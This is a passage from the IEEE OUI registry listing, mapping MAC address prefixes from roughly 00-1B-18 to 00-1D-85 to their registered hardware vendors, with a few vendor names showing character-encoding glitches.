(hex) Palo Alto Networks 00-1B-18 (hex) Tsuken Electric Ind. Co.,Ltd 00-1B-19 (hex) IEEE I&M Society TC9 00-1B-1A (hex) e-trees Japan, Inc. 00-1B-1B (hex) Siemens AG, 00-1B-1C (hex) Coherent 00-1B-1D (hex) Phoenix International Co., Ltd 00-1B-1E (hex) HART Communication Foundation 00-1B-1F (hex) DELTA - Danish Electronics, Light & Acoustics 00-1B-20 (hex) TPine Technology 00-1B-21 (hex) Intel Corporate 00-1B-22 (hex) Palit Microsystems ( H.K.) Ltd. 00-1B-23 (hex) SimpleComTools 00-1B-24 (hex) Quanta Computer Inc. 00-1B-25 (hex) Nortel 00-1B-26 (hex) RON-Telecom ZAO 00-1B-27 (hex) Merlin CSI 00-1B-28 (hex) POLYGON, JSC 00-1B-29 (hex) Avantis.Co.,Ltd 00-1B-2A (hex) Cisco Systems 00-1B-2B (hex) Cisco Systems 00-1B-2C (hex) ATRON electronic GmbH 00-1B-2D (hex) Med-Eng Systems Inc. 00-1B-2E (hex) Sinkyo Electron Inc 00-1B-2F (hex) NETGEAR Inc. 00-1B-30 (hex) Solitech Inc. 00-1B-31 (hex) Neural Image. Co. Ltd. 00-1B-32 (hex) QLogic Corporation 00-1B-33 (hex) Nokia Danmark A/S 00-1B-34 (hex) Focus System Inc. 00-1B-35 (hex) ChongQing JINOU Science & Technology Development CO.,Ltd 00-1B-36 (hex) Tsubata Engineering Co.,Ltd. (Head Office) 00-1B-37 (hex) Computec Oy 00-1B-38 (hex) COMPAL INFORMATION (KUNSHAN) CO., LTD. 00-1B-39 (hex) Proxicast 00-1B-3A (hex) SIMS Corp. 00-1B-3B (hex) Yi-Qing CO., LTD 00-1B-3C (hex) Software Technologies Group,Inc. 00-1B-3D (hex) EuroTel Spa 00-1B-3E (hex) Curtis, Inc. 00-1B-3F (hex) ProCurve Networking by HP 00-1B-40 (hex) Network Automation mxc AB 00-1B-41 (hex) General Infinity Co.,Ltd. 00-1B-42 (hex) Wise & Blue 00-1B-43 (hex) Beijing DG Telecommunications equipment Co.,Ltd 00-1B-44 (hex) SanDisk Corporation 00-1B-45 (hex) ABB AS, Division Automation Products 00-1B-46 (hex) Blueone Technology Co.,Ltd 00-1B-47 (hex) Futarque A/S 00-1B-48 (hex) Shenzhen Lantech Electronics Co., Ltd. 00-1B-49 (hex) Roberts Radio limited 00-1B-4A (hex) W&W Communications, Inc. 00-1B-4B (hex) SANION Co., Ltd. 00-1B-4C (hex) Signtech 00-1B-4D (hex) Areca Technology Corporation 00-1B-4E (hex) Navman New Zealand 00-1B-4F (hex) Avaya Inc. 00-1B-50 (hex) Nizhny Novgorod Factory named after M.Frunze, FSUE (NZiF) 00-1B-51 (hex) Vector Technology Corp. 00-1B-52 (hex) Motorola Mobility, Inc. 00-1B-53 (hex) Cisco Systems 00-1B-54 (hex) Cisco Systems 00-1B-55 (hex) Hurco Automation Ltd. 00-1B-56 (hex) Tehuti Networks Ltd. 00-1B-57 (hex) SEMINDIA SYSTEMS PRIVATE LIMITED 00-1B-58 (hex) ACE CAD Enterprise Co., Ltd. 00-1B-59 (hex) Sony Ericsson Mobile Communications AB 00-1B-5A (hex) Apollo Imaging Technologies, Inc. 00-1B-5B (hex) 2Wire, Inc. 00-1B-5C (hex) Azuretec Co., Ltd. 00-1B-5D (hex) Vololink Pty Ltd 00-1B-5E (hex) BPL Limited 00-1B-5F (hex) Alien Technology 00-1B-60 (hex) NAVIGON AG 00-1B-61 (hex) Digital Acoustics, LLC 00-1B-62 (hex) JHT Optoelectronics Co.,Ltd. 00-1B-63 (hex) Apple Computer Inc. 00-1B-64 (hex) IsaacLandKorea Co., Ltd, 00-1B-65 (hex) China Gridcom Co., Ltd 00-1B-66 (hex) Sennheiser electronic GmbH & Co. KG 00-1B-67 (hex) Ubiquisys Ltd 00-1B-68 (hex) Modnnet Co., Ltd 00-1B-69 (hex) Equaline Corporation 00-1B-6A (hex) Powerwave Technologies Sweden AB 00-1B-6B (hex) Swyx Solutions AG 00-1B-6C (hex) LookX Digital Media BV 00-1B-6D (hex) Midtronics, Inc. 00-1B-6E (hex) Anue Systems, Inc. 00-1B-6F (hex) Teletrak Ltd 00-1B-70 (hex) IRI Ubiteq, INC. 00-1B-71 (hex) Telular Corp. 00-1B-72 (hex) Sicep s.p.a. 00-1B-73 (hex) DTL Broadcast Ltd 00-1B-74 (hex) MiraLink Corporation 00-1B-75 (hex) Hypermedia Systems 00-1B-76 (hex) Ripcode, Inc. 00-1B-77 (hex) Intel Corporate 00-1B-78 (hex) Hewlett-Packard Company 00-1B-79 (hex) FAIVELEY TRANSPORT 00-1B-7A (hex) Nintendo Co., Ltd. 00-1B-7B (hex) The Tintometer Ltd 00-1B-7C (hex) A & R Cambridge 00-1B-7D (hex) CXR Anderson Jacobson 00-1B-7E (hex) Beckmann GmbH 00-1B-7F (hex) TMN Technologies Telecomunicacoes Ltda 00-1B-80 (hex) LORD Corporation 00-1B-81 (hex) DATAQ Instruments, Inc. 00-1B-82 (hex) Taiwan Semiconductor Co., Ltd. 00-1B-83 (hex) Finsoft Ltd 00-1B-84 (hex) Scan Engineering Telecom 00-1B-85 (hex) MAN Diesel SE 00-1B-86 (hex) Bosch Access Systems GmbH 00-1B-87 (hex) Deepsound Tech. Co., Ltd 00-1B-88 (hex) Divinet Access Technologies Ltd 00-1B-89 (hex) EMZA Visual Sense Ltd. 00-1B-8A (hex) 2M Electronic A/S 00-1B-8B (hex) NEC AccessTechnica, Ltd. 00-1B-8C (hex) JMicron Technology Corp. 00-1B-8D (hex) Electronic Computer Systems, Inc. 00-1B-8E (hex) Hulu Sweden AB 00-1B-8F (hex) Cisco Systems 00-1B-90 (hex) Cisco Systems 00-1B-91 (hex) EFKON AG 00-1B-92 (hex) l-acoustics 00-1B-93 (hex) JC Decaux SA DNT 00-1B-94 (hex) T.E.M.A. S.p.A. 00-1B-95 (hex) VIDEO SYSTEMS SRL 00-1B-96 (hex) General Sensing 00-1B-97 (hex) Violin Technologies 00-1B-98 (hex) Samsung Electronics Co., Ltd. 00-1B-99 (hex) KS System GmbH 00-1B-9A (hex) Apollo Fire Detectors Ltd 00-1B-9B (hex) Hose-McCann Communications 00-1B-9C (hex) SATEL sp. z o.o. 00-1B-9D (hex) Novus Security Sp. z o.o. 00-1B-9E (hex) ASKEY COMPUTER CORP 00-1B-9F (hex) Calyptech Pty Ltd 00-1B-A0 (hex) Awox 00-1B-A1 (hex) Ã…mic AB 00-1B-A2 (hex) IDS Imaging Development Systems GmbH 00-1B-A3 (hex) Flexit Group GmbH 00-1B-A4 (hex) S.A.E Afikim 00-1B-A5 (hex) MyungMin Systems, Inc. 00-1B-A6 (hex) intotech inc. 00-1B-A7 (hex) Lorica Solutions 00-1B-A8 (hex) UBI&MOBI,.Inc 00-1B-A9 (hex) BROTHER INDUSTRIES, LTD. 00-1B-AA (hex) XenICs nv 00-1B-AB (hex) Telchemy, Incorporated 00-1B-AC (hex) Curtiss Wright Controls Embedded Computing 00-1B-AD (hex) iControl Incorporated 00-1B-AE (hex) Micro Control Systems, Inc 00-1B-AF (hex) Nokia Danmark A/S 00-1B-B0 (hex) BHARAT ELECTRONICS 00-1B-B1 (hex) Wistron Neweb Corp. 00-1B-B2 (hex) Intellect International NV 00-1B-B3 (hex) Condalo GmbH 00-1B-B4 (hex) Airvod Limited 00-1B-B5 (hex) ZF Electronics GmbH 00-1B-B6 (hex) Bird Electronic Corp. 00-1B-B7 (hex) Alta Heights Technology Corp. 00-1B-B8 (hex) BLUEWAY ELECTRONIC CO;LTD 00-1B-B9 (hex) Elitegroup Computer System Co. 00-1B-BA (hex) Nortel 00-1B-BB (hex) RFTech Co.,Ltd 00-1B-BC (hex) Silver Peak Systems, Inc. 00-1B-BD (hex) FMC Kongsberg Subsea AS 00-1B-BE (hex) ICOP Digital 00-1B-BF (hex) SAGEM COMMUNICATION 00-1B-C0 (hex) Juniper Networks 00-1B-C1 (hex) HOLUX Technology, Inc. 00-1B-C2 (hex) Integrated Control Technology Limitied 00-1B-C3 (hex) Mobisolution Co.,Ltd 00-1B-C4 (hex) Ultratec, Inc. 00-1B-C5 (hex) IEEE Registration Authority 00-1B-C6 (hex) Strato Rechenzentrum AG 00-1B-C7 (hex) StarVedia Technology Inc. 00-1B-C8 (hex) MIURA CO.,LTD 00-1B-C9 (hex) FSN DISPLAY INC 00-1B-CA (hex) Beijing Run Technology LTD. Company 00-1B-CB (hex) PEMPEK SYSTEMS PTY LTD 00-1B-CC (hex) KINGTEK CCTV ALLIANCE CO., LTD. 00-1B-CD (hex) DAVISCOMMS (S) PTE LTD 00-1B-CE (hex) Measurement Devices Ltd 00-1B-CF (hex) Dataupia Corporation 00-1B-D0 (hex) IDENTEC SOLUTIONS 00-1B-D1 (hex) SOGESTMATIC 00-1B-D2 (hex) ULTRA-X ASIA PACIFIC Inc. 00-1B-D3 (hex) Matsushita Electric Panasonic AVC 00-1B-D4 (hex) Cisco Systems 00-1B-D5 (hex) Cisco Systems 00-1B-D6 (hex) Kelvin Hughes Ltd 00-1B-D7 (hex) Scientific Atlanta, A Cisco Company 00-1B-D8 (hex) DVTel LTD 00-1B-D9 (hex) Edgewater Computer Systems 00-1B-DA (hex) UTStarcom Inc 00-1B-DB (hex) Valeo VECS 00-1B-DC (hex) Vencer Co., Ltd. 00-1B-DD (hex) Motorola Mobility, Inc. 00-1B-DE (hex) Renkus-Heinz, Inc. 00-1B-DF (hex) Iskra MIS 00-1B-E0 (hex) TELENOT ELECTRONIC GmbH 00-1B-E1 (hex) ViaLogy 00-1B-E2 (hex) AhnLab,Inc. 00-1B-E3 (hex) Health Hero Network, Inc. 00-1B-E4 (hex) TOWNET SRL 00-1B-E5 (hex) 802automation Limited 00-1B-E6 (hex) VR AG 00-1B-E7 (hex) Postek Electronics Co., Ltd. 00-1B-E8 (hex) Ultratronik GmbH 00-1B-E9 (hex) Broadcom Corporation 00-1B-EA (hex) Nintendo Co., Ltd. 00-1B-EB (hex) DMP Electronics INC. 00-1B-EC (hex) Netio Technologies Co., Ltd 00-1B-ED (hex) Brocade Communications Systems, Inc 00-1B-EE (hex) Nokia Danmark A/S 00-1B-EF (hex) Blossoms Digital Technology Co.,Ltd. 00-1B-F0 (hex) Value Platforms Limited 00-1B-F1 (hex) Nanjing SilverNet Software Co., Ltd. 00-1B-F2 (hex) KWORLD COMPUTER CO., LTD 00-1B-F3 (hex) TRANSRADIO SenderSysteme Berlin AG 00-1B-F4 (hex) KENWIN INDUSTRIAL(HK) LTD. 00-1B-F5 (hex) Tellink Sistemas de Telecomunicación S.L. 00-1B-F6 (hex) CONWISE Technology Corporation Ltd. 00-1B-F7 (hex) Lund IP Products AB 00-1B-F8 (hex) Digitrax Inc. 00-1B-F9 (hex) Intellitect Water Ltd 00-1B-FA (hex) G.i.N. mbH 00-1B-FB (hex) Alps Electric Co., Ltd 00-1B-FC (hex) ASUSTek COMPUTER INC. 00-1B-FD (hex) Dignsys Inc. 00-1B-FE (hex) Zavio Inc. 00-1B-FF (hex) Millennia Media inc. 00-1C-00 (hex) Entry Point, LLC 00-1C-01 (hex) ABB Oy Drives 00-1C-02 (hex) Pano Logic 00-1C-03 (hex) Betty TV Technology AG 00-1C-04 (hex) Airgain, Inc. 00-1C-05 (hex) Nonin Medical Inc. 00-1C-06 (hex) Siemens Numerical Control Ltd., Nanjing 00-1C-07 (hex) Cwlinux Limited 00-1C-08 (hex) Echo360, Inc. 00-1C-09 (hex) SAE Electronic Co.,Ltd. 00-1C-0A (hex) Shenzhen AEE Technology Co.,Ltd. 00-1C-0B (hex) SmartAnt Telecom 00-1C-0C (hex) TANITA Corporation 00-1C-0D (hex) G-Technology, Inc. 00-1C-0E (hex) Cisco Systems 00-1C-0F (hex) Cisco Systems 00-1C-10 (hex) Cisco-Linksys, LLC 00-1C-11 (hex) Motorola Mobility, Inc. 00-1C-12 (hex) Motorola Mobility, Inc. 00-1C-13 (hex) OPTSYS TECHNOLOGY CO., LTD. 00-1C-14 (hex) VMware, Inc 00-1C-15 (hex) TXP Corporation 00-1C-16 (hex) ThyssenKrupp Elevator 00-1C-17 (hex) Nortel 00-1C-18 (hex) Sicert S.r.L. 00-1C-19 (hex) secunet Security Networks AG 00-1C-1A (hex) Thomas Instrumentation, Inc 00-1C-1B (hex) Hyperstone GmbH 00-1C-1C (hex) Center Communication Systems GmbH 00-1C-1D (hex) CHENZHOU GOSPELL DIGITAL TECHNOLOGY CO.,LTD 00-1C-1E (hex) emtrion GmbH 00-1C-1F (hex) Quest Retail Technology Pty Ltd 00-1C-20 (hex) CLB Benelux 00-1C-21 (hex) Nucsafe Inc. 00-1C-22 (hex) Aeris Elettronica s.r.l. 00-1C-23 (hex) Dell Inc 00-1C-24 (hex) Formosa Wireless Systems Corp. 00-1C-25 (hex) Hon Hai Precision Ind. Co.,Ltd. 00-1C-26 (hex) Hon Hai Precision Ind. Co.,Ltd. 00-1C-27 (hex) Sunell Electronics Co. 00-1C-28 (hex) Sphairon Technologies GmbH 00-1C-29 (hex) CORE DIGITAL ELECTRONICS CO., LTD 00-1C-2A (hex) Envisacor Technologies Inc. 00-1C-2B (hex) Alertme.com Limited 00-1C-2C (hex) Synapse 00-1C-2D (hex) FlexRadio Systems 00-1C-2E (hex) ProCurve Networking by HP 00-1C-2F (hex) Pfister GmbH 00-1C-30 (hex) Mode Lighting (UK ) Ltd. 00-1C-31 (hex) Mobile XP Technology Co., LTD 00-1C-32 (hex) Telian Corporation 00-1C-33 (hex) Sutron 00-1C-34 (hex) HUEY CHIAO INTERNATIONAL CO., LTD. 00-1C-35 (hex) Nokia Danmark A/S 00-1C-36 (hex) iNEWiT NV 00-1C-37 (hex) Callpod, Inc. 00-1C-38 (hex) Bio-Rad Laboratories, Inc. 00-1C-39 (hex) S Netsystems Inc. 00-1C-3A (hex) Element Labs, Inc. 00-1C-3B (hex) AmRoad Technology Inc. 00-1C-3C (hex) Seon Design Inc. 00-1C-3D (hex) WaveStorm Paris ÃŽle-de-France 75015 00-1C-3E (hex) ECKey Limited 00-1C-3F (hex) International Police Technologies, Inc. 00-1C-40 (hex) VDG-Security bv 00-1C-41 (hex) scemtec Transponder Technology GmbH 00-1C-42 (hex) Parallels, Inc. 00-1C-43 (hex) Samsung Electronics Co.,Ltd 00-1C-44 (hex) Bosch Security Systems BV 00-1C-45 (hex) Chenbro Micom Co., Ltd. 00-1C-46 (hex) QTUM 00-1C-47 (hex) Hangzhou Hollysys Automation Co., Ltd 00-1C-48 (hex) WiDeFi, Inc. 00-1C-49 (hex) Zoltan Technology Inc. 00-1C-4A (hex) AVM GmbH 00-1C-4B (hex) Gener8, Inc. 00-1C-4C (hex) Petrotest Instruments 00-1C-4D (hex) Zeetoo, Inc. 00-1C-4E (hex) TASA International Limited 00-1C-4F (hex) MACAB AB 00-1C-50 (hex) TCL Technoly Electronics(Huizhou)Co.,Ltd 00-1C-51 (hex) Celeno Communications 00-1C-52 (hex) VISIONEE SRL 00-1C-53 (hex) Synergy Lighting Controls 00-1C-54 (hex) Hillstone Networks Inc 00-1C-55 (hex) Shenzhen Kaifa Technology Co. 00-1C-56 (hex) Pado Systems, Inc. 00-1C-57 (hex) Cisco Systems 00-1C-58 (hex) Cisco Systems 00-1C-59 (hex) DEVON IT 00-1C-5A (hex) Advanced Relay Corporation 00-1C-5B (hex) Chubb Electronic Security Systems Ltd 00-1C-5C (hex) Integrated Medical Systems, Inc. 00-1C-5D (hex) Leica Microsystems 00-1C-5E (hex) ASTON France 00-1C-5F (hex) Winland Electronics, Inc. 00-1C-60 (hex) CSP Frontier Technologies,Inc. 00-1C-61 (hex) Galaxy Technology (HK) Ltd. 00-1C-62 (hex) LG Electronics Inc 00-1C-63 (hex) TRUEN 00-1C-64 (hex) Cellnet+Hunt 00-1C-65 (hex) JoeScan, Inc. 00-1C-66 (hex) UCAMP CO.,LTD 00-1C-67 (hex) Pumpkin Networks, Inc. 00-1C-68 (hex) Anhui Sun Create Electronics Co., Ltd 00-1C-69 (hex) Packet Vision Ltd 00-1C-6A (hex) Weiss Engineering Ltd. 00-1C-6B (hex) COVAX Co. Ltd 00-1C-6C (hex) Jabil Circuit (Guangzhou) Limited 00-1C-6D (hex) KYOHRITSU ELECTRONIC INDUSTRY CO., LTD. 00-1C-6E (hex) Newbury Networks, Inc. 00-1C-6F (hex) Emfit Ltd 00-1C-70 (hex) NOVACOMM LTDA 00-1C-71 (hex) Emergent Electronics 00-1C-72 (hex) Mayer & Cie GmbH & Co KG 00-1C-73 (hex) Arista Networks, Inc. 00-1C-74 (hex) Syswan Technologies Inc. 00-1C-75 (hex) RF Systems GmbH 00-1C-76 (hex) The Wandsworth Group Ltd 00-1C-77 (hex) Prodys 00-1C-78 (hex) WYPLAY SAS 00-1C-79 (hex) Cohesive Financial Technologies LLC 00-1C-7A (hex) Perfectone Netware Company Ltd 00-1C-7B (hex) Castlenet Technology Inc. 00-1C-7C (hex) PERQ SYSTEMS CORPORATION 00-1C-7D (hex) Excelpoint Manufacturing Pte Ltd 00-1C-7E (hex) Toshiba 00-1C-7F (hex) Check Point Software Technologies 00-1C-80 (hex) New Business Division/Rhea-Information CO., LTD. 00-1C-81 (hex) NextGen Venturi LTD 00-1C-82 (hex) Genew Technologies 00-1C-83 (hex) New Level Telecom Co., Ltd. 00-1C-84 (hex) STL Solution Co.,Ltd. 00-1C-85 (hex) Eunicorn 00-1C-86 (hex) Cranite Systems, Inc. 00-1C-87 (hex) Uriver Inc. 00-1C-88 (hex) TRANSYSTEM INC. 00-1C-89 (hex) Force Communications, Inc. 00-1C-8A (hex) Cirrascale Corporation 00-1C-8B (hex) MJ Innovations Ltd. 00-1C-8C (hex) DIAL TECHNOLOGY LTD. 00-1C-8D (hex) Mesa Imaging 00-1C-8E (hex) Alcatel-Lucent IPD 00-1C-8F (hex) Advanced Electronic Design, Inc. 00-1C-90 (hex) Empacket Corporation 00-1C-91 (hex) Gefen Inc. 00-1C-92 (hex) Tervela 00-1C-93 (hex) ExaDigm Inc 00-1C-94 (hex) LI-COR Biosciences 00-1C-95 (hex) Opticomm Corporation 00-1C-96 (hex) Linkwise Technology Pte Ltd 00-1C-97 (hex) Enzytek Technology Inc., 00-1C-98 (hex) LUCKY TECHNOLOGY (HK) COMPANY LIMITED 00-1C-99 (hex) Shunra Software Ltd. 00-1C-9A (hex) Nokia Danmark A/S 00-1C-9B (hex) FEIG ELECTRONIC GmbH 00-1C-9C (hex) Nortel 00-1C-9D (hex) Liecthi AG 00-1C-9E (hex) Dualtech IT AB 00-1C-9F (hex) Razorstream, LLC 00-1C-A0 (hex) Production Resource Group, LLC 00-1C-A1 (hex) AKAMAI TECHNOLOGIES, INC. 00-1C-A2 (hex) PIRELLI BROADBAND SOLUTIONS 00-1C-A3 (hex) Terra 00-1C-A4 (hex) Sony Ericsson Mobile Communications 00-1C-A5 (hex) Zygo Corporation 00-1C-A6 (hex) Win4NET 00-1C-A7 (hex) International Quartz Limited 00-1C-A8 (hex) AirTies Wireless Networks 00-1C-A9 (hex) Audiomatica Srl 00-1C-AA (hex) Bellon Pty Ltd 00-1C-AB (hex) Meyer Sound Laboratories, Inc. 00-1C-AC (hex) Qniq Technology Corp. 00-1C-AD (hex) Wuhan Telecommunication Devices Co.,Ltd 00-1C-AE (hex) WiChorus, Inc. 00-1C-AF (hex) Plato Networks Inc. 00-1C-B0 (hex) Cisco Systems 00-1C-B1 (hex) Cisco Systems 00-1C-B2 (hex) BPT SPA 00-1C-B3 (hex) APPLE, INC 00-1C-B4 (hex) Iridium Satellite LLC 00-1C-B5 (hex) Neihua Network Technology Co.,LTD.(NHN) 00-1C-B6 (hex) Duzon CNT Co., Ltd. 00-1C-B7 (hex) USC DigiArk Corporation 00-1C-B8 (hex) CBC Co., Ltd 00-1C-B9 (hex) KWANG SUNG ELECTRONICS CO., LTD. 00-1C-BA (hex) VerScient, Inc. 00-1C-BB (hex) MusicianLink 00-1C-BC (hex) CastGrabber, LLC 00-1C-BD (hex) Ezze Mobile Tech., Inc. 00-1C-BE (hex) Nintendo Co., Ltd. 00-1C-BF (hex) Intel Corporate 00-1C-C0 (hex) Intel Corporate 00-1C-C1 (hex) Motorola Mobility, Inc. 00-1C-C2 (hex) Part II Research, Inc. 00-1C-C3 (hex) Pace plc 00-1C-C4 (hex) Hewlett-Packard Company 00-1C-C5 (hex) 3COM LTD 00-1C-C6 (hex) ProStor Systems 00-1C-C7 (hex) Rembrandt Technologies, LLC d/b/a REMSTREAM 00-1C-C8 (hex) INDUSTRONIC Industrie-Electronic GmbH & Co. KG 00-1C-C9 (hex) Kaise Electronic Technology Co., Ltd. 00-1C-CA (hex) Shanghai Gaozhi Science & Technology Development Co. 00-1C-CB (hex) Forth Corporation Public Company Limited 00-1C-CC (hex) Research In Motion Limited 00-1C-CD (hex) Alektrona Corporation 00-1C-CE (hex) By Techdesign 00-1C-CF (hex) LIMETEK 00-1C-D0 (hex) Circleone Co.,Ltd. 00-1C-D1 (hex) Waves Audio LTD 00-1C-D2 (hex) King Champion (Hong Kong) Limited 00-1C-D3 (hex) ZP Engineering SEL 00-1C-D4 (hex) Nokia Danmark A/S 00-1C-D5 (hex) ZeeVee, Inc. 00-1C-D6 (hex) Nokia Danmark A/S 00-1C-D7 (hex) Harman/Becker Automotive Systems GmbH 00-1C-D8 (hex) BlueAnt Wireless 00-1C-D9 (hex) GlobalTop Technology Inc. 00-1C-DA (hex) Exegin Technologies Limited 00-1C-DB (hex) CARPOINT CO.,LTD 00-1C-DC (hex) Custom Computer Services, Inc. 00-1C-DD (hex) COWBELL ENGINEERING CO., LTD. 00-1C-DE (hex) Interactive Multimedia eXchange Inc. 00-1C-DF (hex) Belkin International Inc. 00-1C-E0 (hex) DASAN TPS 00-1C-E1 (hex) INDRA SISTEMAS, S.A. 00-1C-E2 (hex) Attero Tech, LLC. 00-1C-E3 (hex) Optimedical Systems 00-1C-E4 (hex) EleSy JSC 00-1C-E5 (hex) MBS Electronic Systems GmbH 00-1C-E6 (hex) INNES 00-1C-E7 (hex) Rocon PLC Research Centre 00-1C-E8 (hex) Cummins Inc 00-1C-E9 (hex) Galaxy Technology Limited 00-1C-EA (hex) Scientific-Atlanta, Inc 00-1C-EB (hex) Nortel 00-1C-EC (hex) Mobilesoft (Aust.) Pty Ltd 00-1C-ED (hex) ENVIRONNEMENT SA 00-1C-EE (hex) SHARP Corporation 00-1C-EF (hex) Primax Electronics LTD 00-1C-F0 (hex) D-Link Corporation 00-1C-F1 (hex) SUPoX Technology Co. , LTD. 00-1C-F2 (hex) Tenlon Technology Co.,Ltd. 00-1C-F3 (hex) EVS BROADCAST EQUIPMENT 00-1C-F4 (hex) Media Technology Systems Inc 00-1C-F5 (hex) Wiseblue Technology Limited 00-1C-F6 (hex) Cisco Systems 00-1C-F7 (hex) AudioScience 00-1C-F8 (hex) Parade Technologies, Ltd. 00-1C-F9 (hex) Cisco Systems 00-1C-FA (hex) Alarm.com 00-1C-FB (hex) Motorola Mobility, Inc. 00-1C-FC (hex) Suminet Communication Technologies (Shanghai) Co., Ltd. 00-1C-FD (hex) Universal Electronics 00-1C-FE (hex) Quartics Inc 00-1C-FF (hex) Napera Networks Inc 00-1D-00 (hex) Brivo Systems, LLC 00-1D-01 (hex) Neptune Digital 00-1D-02 (hex) Cybertech Telecom Development 00-1D-03 (hex) Design Solutions Inc. 00-1D-04 (hex) Zipit Wireless, Inc. 00-1D-05 (hex) iLight 00-1D-06 (hex) HM Electronics, Inc. 00-1D-07 (hex) Shenzhen Sang Fei Consumer Communications Co.,Ltd 00-1D-08 (hex) JIANGSU YINHE ELECTRONICS CO., LTD 00-1D-09 (hex) Dell Inc 00-1D-0A (hex) Davis Instruments, Inc. 00-1D-0B (hex) Power Standards Lab 00-1D-0C (hex) MobileCompia 00-1D-0D (hex) Sony Computer Entertainment inc. 00-1D-0E (hex) Agapha Technology co., Ltd. 00-1D-0F (hex) TP-LINK Technologies Co., Ltd. 00-1D-10 (hex) LightHaus Logic, Inc. 00-1D-11 (hex) Analogue & Micro Ltd 00-1D-12 (hex) ROHM CO., LTD. 00-1D-13 (hex) NextGTV 00-1D-14 (hex) SPERADTONE INFORMATION TECHNOLOGY LIMITED 00-1D-15 (hex) Shenzhen Dolphin Electronic Co., Ltd 00-1D-16 (hex) Efixo 00-1D-17 (hex) Digital Sky Corporation 00-1D-18 (hex) Power Innovation GmbH 00-1D-19 (hex) Arcadyan Technology Corporation 00-1D-1A (hex) OvisLink S.A. 00-1D-1B (hex) Sangean Electronics Inc. 00-1D-1C (hex) Gennet s.a. 00-1D-1D (hex) Inter-M Corporation 00-1D-1E (hex) KYUSHU TEN CO.,LTD 00-1D-1F (hex) Siauliu Tauro Televizoriai, JSC 00-1D-20 (hex) COMTREND CO. 00-1D-21 (hex) Alcad SL 00-1D-22 (hex) Foss Analytical A/S 00-1D-23 (hex) SENSUS 00-1D-24 (hex) Aclara Power-Line Systems Inc. 00-1D-25 (hex) Samsung Electronics Co.,Ltd 00-1D-26 (hex) Rockridgesound Technology Co. 00-1D-27 (hex) NAC-INTERCOM 00-1D-28 (hex) Sony Ericsson Mobile Communications AB 00-1D-29 (hex) Doro AB 00-1D-2A (hex) Tideway Electronic LTD 00-1D-2B (hex) Wuhan Pont Technology CO. , LTD 00-1D-2C (hex) Wavetrend Technologies (Pty) Limited 00-1D-2D (hex) Pylone, Inc. 00-1D-2E (hex) Ruckus Wireless 00-1D-2F (hex) QuantumVision Corporation 00-1D-30 (hex) YX Wireless S.A. 00-1D-31 (hex) HIGHPRO INTERNATIONAL R&D CO,.LTD. 00-1D-32 (hex) Longkay Communication & Technology (Shanghai) Co. Ltd 00-1D-33 (hex) Maverick Systems Inc. 00-1D-34 (hex) SYRIS Technology Corp 00-1D-35 (hex) Viconics Electronics Inc. 00-1D-36 (hex) ELECTRONICS CORPORATION OF INDIA LIMITED 00-1D-37 (hex) Thales-Panda Transportation System 00-1D-38 (hex) Seagate Technology 00-1D-39 (hex) MOOHADIGITAL CO., LTD 00-1D-3A (hex) mh acoustics LLC 00-1D-3B (hex) Nokia Danmark A/S 00-1D-3C (hex) Muscle Corporation 00-1D-3D (hex) Avidyne Corporation 00-1D-3E (hex) SAKA TECHNO SCIENCE CO.,LTD 00-1D-3F (hex) Mitron Pty Ltd 00-1D-40 (hex) Living Independently Group, Inc. 00-1D-41 (hex) Hardy Instruments 00-1D-42 (hex) Nortel 00-1D-43 (hex) Shenzhen G-link Digital Technology Co., Ltd. 00-1D-44 (hex) Krohne 00-1D-45 (hex) Cisco Systems 00-1D-46 (hex) Cisco Systems 00-1D-47 (hex) Covote GmbH & Co KG 00-1D-48 (hex) Sensor-Technik Wiedemann GmbH 00-1D-49 (hex) Innovation Wireless Inc. 00-1D-4A (hex) Carestream Health, Inc. 00-1D-4B (hex) Grid Connect Inc. 00-1D-4C (hex) Alcatel-Lucent 00-1D-4D (hex) Adaptive Recognition Hungary, Inc 00-1D-4E (hex) TCM Mobile LLC 00-1D-4F (hex) Apple Computer Inc. 00-1D-50 (hex) SPINETIX SA 00-1D-51 (hex) Babcock & Wilcox Power Generation Group, Inc 00-1D-52 (hex) Defzone B.V. 00-1D-53 (hex) S&O Electronics (Malaysia) Sdn. Bhd. 00-1D-54 (hex) Sunnic Technology & Merchandise INC. 00-1D-55 (hex) ZANTAZ, Inc 00-1D-56 (hex) Kramer Electronics Ltd. 00-1D-57 (hex) CAETEC Messtechnik 00-1D-58 (hex) CQ Inc 00-1D-59 (hex) Mitra Energy & Infrastructure 00-1D-5A (hex) 2Wire Inc. 00-1D-5B (hex) Tecvan Informatica Ltda 00-1D-5C (hex) Tom Communication Industrial Co.,Ltd. 00-1D-5D (hex) Control Dynamics Pty. Ltd. 00-1D-5E (hex) COMING MEDIA CORP. 00-1D-5F (hex) OverSpeed SARL 00-1D-60 (hex) ASUSTek COMPUTER INC. 00-1D-61 (hex) BIJ Corporation 00-1D-62 (hex) InPhase Technologies 00-1D-63 (hex) Miele & Cie. KG 00-1D-64 (hex) Adam Communications Systems Int Ltd 00-1D-65 (hex) Microwave Radio Communications 00-1D-66 (hex) Hyundai Telecom 00-1D-67 (hex) AMEC 00-1D-68 (hex) Thomson Telecom Belgium 00-1D-69 (hex) Knorr-Bremse AG 00-1D-6A (hex) Alpha Networks Inc. 00-1D-6B (hex) Motorola (formerly Netopia, Inc 00-1D-6C (hex) ClariPhy Communications, Inc. 00-1D-6D (hex) Confidant International LLC 00-1D-6E (hex) Nokia Danmark A/S 00-1D-6F (hex) Chainzone Technology Co., Ltd 00-1D-70 (hex) Cisco Systems 00-1D-71 (hex) Cisco Systems 00-1D-72 (hex) Wistron Corporation 00-1D-73 (hex) Buffalo Inc. 00-1D-74 (hex) Tianjin China-Silicon Microelectronics Co., Ltd. 00-1D-75 (hex) Radioscape PLC 00-1D-76 (hex) Eyeheight Ltd. 00-1D-77 (hex) NSGate 00-1D-78 (hex) Invengo Information Technology Co.,Ltd 00-1D-79 (hex) SIGNAMAX LLC 00-1D-7A (hex) Wideband Semiconductor, Inc. 00-1D-7B (hex) Ice Energy, Inc. 00-1D-7C (hex) ABE Elettronica S.p.A. 00-1D-7D (hex) GIGA-BYTE TECHNOLOGY CO.,LTD. 00-1D-7E (hex) Cisco-Linksys, LLC 00-1D-7F (hex) Tekron International Ltd 00-1D-80 (hex) Beijing Huahuan Eletronics Co.,Ltd 00-1D-81 (hex) GUANGZHOU GATEWAY ELECTRONICS CO., LTD 00-1D-82 (hex) GN A/S (GN Netcom A/S) 00-1D-83 (hex) Emitech Corporation 00-1D-84 (hex) Gateway, Inc. 00-1D-85 (hex) Call Direct Cellular Solutions 00-1D-86 (hex) 